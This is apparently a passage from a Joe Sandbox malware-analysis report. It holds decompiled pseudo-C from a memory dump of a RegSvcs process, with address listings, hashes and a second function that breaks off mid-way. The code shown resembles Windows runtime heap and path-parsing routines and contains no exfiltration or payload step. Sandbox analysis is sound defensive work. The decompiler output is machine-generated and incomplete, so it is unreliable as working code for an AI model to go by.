				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01994C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0190D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01995542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x19b60e8;
								if( *0x19b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x19b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01909710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01906DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0190F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0190F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0190F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0190FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0190FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0190F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0190F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01994CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0191D130(_t427, _t494, _t511);
				}
			}

0x01995ba5
0x01995baa
0x01995baf
0x01995bb4
0x01995bb6
0x01995bbc
0x01995bbe
0x01995bc4
0x01995bcd
0x01995bd3
0x01995bd6
0x01995bdc
0x01995be0
0x01995be3
0x01995beb
0x01995bf2
0x01995bf8
0x01995bfe
0x01995c04
0x01995c0e
0x01995c18
0x01995c1f
0x01995c25
0x01995c2a
0x01995c2c
0x01995c32
0x01995c3a
0x01995c3f
0x01995c42
0x01995c48
0x01995c5b
0x01995c5b
0x01995c2c
0x01995cb7
0x01995cb9
0x01995cbf
0x01995cc2
0x01995cca
0x01995ccb
0x01995ccb
0x01995cd1
0x01995cd7
0x01995cda
0x01995ce1
0x01995ce4
0x01995ce7
0x01995ced
0x01995cf3
0x01995cf9
0x01995cff
0x01995d08
0x01995d0a
0x01995d0e
0x01995d10
0x00000000
0x00000000
0x01995d16
0x01995d1a
0x00000000
0x00000000
0x01995d20
0x01995d22
0x01995d25
0x01995d2f
0x01995d2f
0x01995d33
0x01995d3d
0x01995d49
0x01995d4b
0x00000000
0x00000000
0x01995d5a
0x01995d5d
0x01995d60
0x00000000
0x00000000
0x01995d66
0x01995d69
0x00000000
0x00000000
0x01995d6f
0x01995d6f
0x01995d73
0x01995d79
0x01995d7f
0x01995d86
0x01995d95
0x01995d98
0x01995dba
0x01995dcb
0x01995dce
0x01995dd3
0x01995dd6
0x01995dd8
0x01995de6
0x01995dec
0x01995dee
0x01995df1
0x01995df3
0x0199635a
0x0199635a
0x00000000
0x0199635a
0x01995dfe
0x01995e02
0x01995e05
0x01995e07
0x01995e10
0x01995e13
0x01995e1b
0x01995e1c
0x01995e21
0x01995e22
0x01995e23
0x01995e25
0x01995e2a
0x01995e2c
0x01995e2e
0x01995e36
0x01995e39
0x01995e42
0x01995e47
0x01995e4d
0x01995e54
0x01995e54
0x01995e54
0x01995e2e
0x01995e5c
0x01995e5f
0x01995e62
0x01995e64
0x01995e6b
0x01995e70
0x01995e7a
0x01995e7a
0x01995e7a
0x01995e6b
0x01995e7e
0x01995e7f
0x01995e7f
0x01995e81
0x01995e87
0x01995e8b
0x01995e8c
0x01995e8c
0x01995e8c
0x01995e9a
0x01995e9c
0x01995ea2
0x01995ea6
0x01995f50
0x01995f50
0x01995f57
0x01995f66
0x01995f66
0x01995f66
0x01995f68
0x01995f6a
0x019963d0
0x00000000
0x01995f70
0x01995f70
0x01995f91
0x01995f9c
0x01995f9e
0x01995fa4
0x01995fa6
0x0199638c
0x01996392
0x019963a1
0x019963a7
0x019963af
0x019963af
0x019963bd
0x019963d8
0x00000000
0x019963d8
0x01995fac
0x01995fb2
0x01995fb4
0x01995fbd
0x01995fc6
0x01995fce
0x01995fd4
0x01995fdc
0x01995fec
0x01995fed
0x01995fee
0x01995fef
0x01995ff9
0x01995ffa
0x01995ffb
0x01995ffc
0x01996000
0x01996004
0x01996012
0x01996012
0x01996018
0x01996019
0x0199601a
0x0199601b
0x0199601c
0x01996020
0x01996059
0x0199605c
0x01996061
0x01996061
0x01996022
0x01996022
0x01996022
0x01996025
0x0199602a
0x0199602b
0x01996031
0x01996037
0x01996038
0x0199603e
0x01996048
0x01996049
0x0199604a
0x0199604b
0x0199604c
0x0199604d
0x01996053
0x01996054
0x01996054
0x01996062
0x01996065
0x01996067
0x0199606a
0x01996070
0x01996075
0x01996076
0x01996081
0x01996087
0x01996095
0x01996099
0x0199609e
0x019960a4
0x019960ae
0x019960b0
0x019960b3
0x019960b6
0x019960b8
0x019960ba
0x019960ba
0x019960ba
0x019960ba
0x019960be
0x019960c0
0x019960c5
0x019960c5
0x019960c5
0x019960c6
0x019960cd
0x01996114
0x019960cf
0x019960cf
0x019960d4
0x019960d5
0x019960da
0x019960db
0x019960e1
0x019960e2
0x019960e8
0x019960f8
0x019960fd
0x019960fe
0x01996102
0x01996104
0x01996107
0x01996109
0x0199610b
0x0199610b
0x0199610b
0x0199610b
0x0199610f
0x0199610f
0x01996117
0x0199611a
0x0199611f
0x01996125
0x01996134
0x01996139
0x0199613f
0x01996146
0x01996148
0x0199614b
0x0199614d
0x0199614f
0x0199614f
0x0199614f
0x0199614f
0x01996153
0x01996159
0x01996159
0x0199615c
0x01996163
0x01996169
0x0199616c
0x01996172
0x01996181
0x01996186
0x01996187
0x0199618b
0x01996191
0x01996195
0x019961a3
0x019961bb
0x019961c0
0x019961c3
0x019961cc
0x019961d0
0x019961dc
0x019961de
0x019961e1
0x019961e4
0x019961e6
0x019961e8
0x019961e8
0x019961e8
0x019961e8
0x019961e6
0x019961ec
0x019961f3
0x01996203
0x01996209
0x0199620a
0x01996216
0x0199621d
0x01996227
0x01996241
0x01996246
0x0199624c
0x01996257
0x01996259
0x0199625c
0x0199625e
0x01996260
0x01996260
0x01996260
0x01996260
0x0199625e
0x01996264
0x01996267
0x01996269
0x01996315
0x01996315
0x0199631b
0x0199631e
0x01996324
0x01996327
0x0199632f
0x01996330
0x01996333
0x0199633a
0x0199633c
0x01996335
0x01996335
0x01996335
0x0199633f
0x01996342
0x0199634c
0x01996352
0x01996355
0x01996355
0x01996359
0x00000000
0x0199626f
0x01996275
0x01996275
0x01996278
0x0199627e
0x0199627e
0x01996281
0x01996287
0x0199628d
0x01996298
0x0199629c
0x019962a2
0x0199629e
0x0199629e
0x0199629e
0x019962a7
0x019962a7
0x019962aa
0x019962b0
0x019962f0
0x019962f0
0x019962f2
0x019962f8
0x019962fd
0x019962b2
0x019962b2
0x019962b2
0x019962b5
0x019962dd
0x019962e2
0x019962e5
0x019962b7
0x019962b8
0x019962bb
0x019962bd
0x019962c0
0x019962c4
0x019962cd
0x019962cd
0x019962c0
0x019962bb
0x019962b5
0x01996302
0x01996303
0x01996305
0x01996305
0x01996305
0x0199630c
0x0199630c
0x00000000
0x0199627e
0x01996269
0x01995eac
0x01995ebb
0x01995ebe
0x01995ecb
0x01995ecb
0x01995ece
0x01995ece
0x01995ed4
0x01995ed7
0x01995ed9
0x01995edb
0x01995edb
0x01995ee1
0x01995ee1
0x01995ee3
0x01995f20
0x01995f20
0x01995ee5
0x01995ee5
0x01995ee5
0x01995ee8
0x01995f11
0x01995f18
0x01995eea
0x01995eea
0x01995eed
0x01995ef2
0x01995ef8
0x01995efb
0x01995f0a
0x01995f0a
0x01995eed
0x01995ee8
0x01995f22
0x01995f28
0x00000000
0x00000000
0x01995f30
0x01995f31
0x01995f37
0x01995f3a
0x01995f3d
0x01995f44
0x00000000
0x00000000
0x00000000
0x01995f46
0x01995f48
0x01995f4d
0x00000000
0x01995f4d
0x01995dda
0x01995ddf
0x00000000
0x01995ddf
0x01995dd8
0x01995da7
0x01995da9
0x01995dac
0x01995dae
0x00000000
0x01995db4
0x01995db4
0x00000000
0x01995db4
0x01995dae
0x01995d88
0x01995d8d
0x01996363
0x01996369
0x0199636a
0x01996370
0x01996372
0x0199637a
0x0199637b
0x0199637d
0x00000000
0x00000000
0x0199637f
0x01996385
0x00000000
0x01996385
0x01995d38
0x01995d3b
0x00000000
0x00000000
0x00000000
0x01995d3b
0x01995d27
0x01995d29
0x00000000
0x00000000
0x00000000
0x01996360
0x00000000
0x01996360
0x01995c10
0x01995c10
0x019963da
0x019963e5
0x019963e5

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a207a0efcf8985cb65aa40a1eb080a73a02c3db172ca39e085486a9f68a040f3
Instruction ID: 83b2f75d667b1cdb3dc7c5ca5490b91825c22efbcbafe92740c982280f1295dd
Opcode Fuzzy Hash: a207a0efcf8985cb65aa40a1eb080a73a02c3db172ca39e085486a9f68a040f3
Instruction Fuzzy Hash: 45425B71900229CFEB25CF6CC881BAABBB5FF45305F1581AAD94DEB242D734A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018E4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E018E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x19bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E018FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E018E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L018E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E018E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
